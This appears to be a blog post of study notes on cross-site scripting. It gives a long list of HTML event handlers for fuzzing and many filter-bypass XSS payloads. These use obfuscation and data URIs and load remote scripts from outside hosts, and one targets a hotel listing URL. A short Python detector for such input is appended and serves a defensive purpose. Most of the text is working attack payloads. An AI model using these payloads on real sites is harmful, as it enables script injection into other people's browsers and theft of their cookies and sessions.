
XSS fuzz test parameters and WAF bypass methods

12 December 2016 11:06 | Study notes | No comments | 1,341 characters (2,443 views)

[Note: this article is the blogger's original work! If you repost it, please include a link to the original, at least in txt form!]

A list of XSS fuzz parameters (event handler attributes)

onerror
onload
onmouseenter
onstalled
onclick
onmousemove
onseeking
onvolumechange
onwaiting
onmouseover
onabort
onactivate
onafterprint
onafterupdate
onbeforeactivate
onbeforecopy
onbeforecut
onbeforedeactivate
onbeforeeditfocus
onbeforepaste
onbeforeprint
onbeforeunload
onbeforeupdate
onblur
onbounce
oncellchange
onchange
oncontextmenu
oncontrolselect
oncopy
oncut
ondataavailable
ondatasetchanged
ondatasetcomplete
ondblclick
ondeactivate
ondrag
ondragend
ondragenter
ondragleave
ondragover
ondragstart
ondrop
onerrorupdate
onfilterchange
onfinish
onfocus
onfocusin
onfocusout
onhelp
onkeydown
onkeypress
onkeyup
onlayoutcomplete
onlosecapture
onmousedown
onmouseleave
onmouseout
onmouseup
onmousewheel
onmove
onmoveend
onmovestart
onpaste
onpropertychange
onreadystatechange
onreset
onresize
onresizeend
onresizestart
onrowenter
onrowexit
onrowsdelete
onrowsinserted
onscroll
onselect
onselectionchange
onselectstart
onstart
onstop
onsubmit
onunload
oncanplay
onformchange
onforminput
onpause
onplay
onplaying
onratechange
onredo
onseeked

Example of bypass code:
http://hotel.xxx.com/list?city=2500&&keyword="onfocus=$.getScript`//Baidu.com/HouZhui`%20
In many cases a backtick "`" is used in place of the quotes, so the payload becomes alert(`A`), and that alone gets past the WAF.

<img src=x onerror=with(document)body.appendChild(document.createElement('script')).src="//Baidu.com/HouZhui"></img>
<img src=x onerror="with(document)body.appendChild(createElement('script')).src='//Baidu.com/HouZhui'"></img>
<img src=1 onerror=jQuery.getScript("//Baidu.com/HouZhui")>
<img src="#" onerror="$.getScript('\u002f\u002fBaidu.com\u002fHouZhui')">
<img src="#" onerror="var a=String.fromCharCode(47);$.getScript(a+a+'Baidu.com'+a+'HouZhui')">
<img src='0' onselect=with(document)body.appendChild(createElement(`script`)).src=`//Baidu.com/HouZhui`%20>
<img src=i onerror=eval(jQuery.getScript('//Baidu.com/HouZhui'))>
<img src=1 onerror=setTimeout("ale".concat("rt(docum","ent.cookie",")"),0)>

<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
<object data='data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL2dkZC5nZC9qN00xPjwvc2NyaXB0Pg=='>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<object data='data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL2dkZC5nZC9qPjwvc2NyaXB0Pg=='>
<input onfocus=\u0064ocument.write(String.fromCharCode(60,115,67,82,105,80,116,32,115,82,67,61,104,116,116,112,58,47,47,120,121,108,46,108,105,102,101,47,106,62,60,47,115,67,114,73,112,84,62)) autofocus>
// did not work in testing
<img src=N onerror=eval(javascript:document.write(unescape(`<sCRiPt sRC=http://Baidu.com/HouZhui></sCrIpT>`));)>

<img src=x onerror=with(body)createElement('script').src='//gdd.gd/1'>
S1: the img element's src attribute fails to load, so the onerror event fires.
S2: with() scopes the expression to body; the DOM's createElement method creates a script element, and the script's src attribute is pointed at the external JS file to be loaded, which achieves the attack.
<img src=x onerror=document.body.appendChild(document.createElement(`script`)).src=`//Baidu.com/HouZhui`>
// did not work in testing

// did not work in testing
<img src="http://x.jpg" onload="s=document.createElement('script');s.src='http://Baidu.com/HouZhui'+Math.random();document.body.appendChild(s)" border="0">
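
A defender-side check for input of the kind shown above, added here as an example (it is not code from the original post): it normalises a request parameter value (repeated percent-decoding, HTML entities) and then matches the generic traits these payloads share, a generic on...= attribute pattern rather than a fixed handler blocklist, backtick-delimited strings, remote script loading, data:text/html URIs and character-code obfuscation. The sample inputs in the test are taken from the payloads above; the signal names are my own.

```python
import html
import re
from urllib.parse import unquote

# Signals checked after normalisation. The generic on[a-z]+= pattern covers
# every handler in the fuzz list above and any handler the list omits; the
# lookbehind demands attribute-like context (whitespace, quote, backtick or
# slash before "on") so ordinary parameters such as online=true do not fire.
SIGNALS = {
    "event_handler": re.compile(r"(?<=[\s\"'`/])on[a-z]{2,}\s*=", re.I),
    # backtick-delimited strings, as in alert(`A`) or $.getScript`//host/p`
    "template_literal": re.compile(r"`[^`]*`"),
    # loading a remote script via jQuery or a DOM-created <script> element
    "remote_script": re.compile(r"getScript|createElement\s*\(\s*[`'\"]script", re.I),
    "data_html": re.compile(r"data:\s*text/html", re.I),
    # String.fromCharCode(...) or \uXXXX escapes used to hide the payload
    "obfuscation": re.compile(r"String\.fromCharCode|\\u[0-9a-f]{4}", re.I),
}


def normalise(value: str) -> str:
    """Undo the encodings a request value can arrive in before matching."""
    prev = None
    # Percent-decode up to three rounds so double encoding is unwrapped too.
    for _ in range(3):
        if value == prev:
            break
        prev, value = value, unquote(value)
    # Browsers decode HTML entities inside attribute values (e.g. &#x60;).
    return html.unescape(value)


def scan(value: str) -> list[str]:
    """Return the names of every signal that fires on the normalised value."""
    text = normalise(value)
    return [name for name, rx in SIGNALS.items() if rx.search(text)]


if __name__ == "__main__":
    # Constructed sample: the bypass URL parameter from the post above.
    print(scan(r'"onfocus=$.getScript`//Baidu.com/HouZhui`%20'))
```

Because matching happens on the decoded value, a double-encoded %2522onerror%253D is caught the same way as the plain form; tune the context lookbehind to the parameter's real reflection context before deploying it as a rule.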

oncanplay xss

http://html5sec.org/
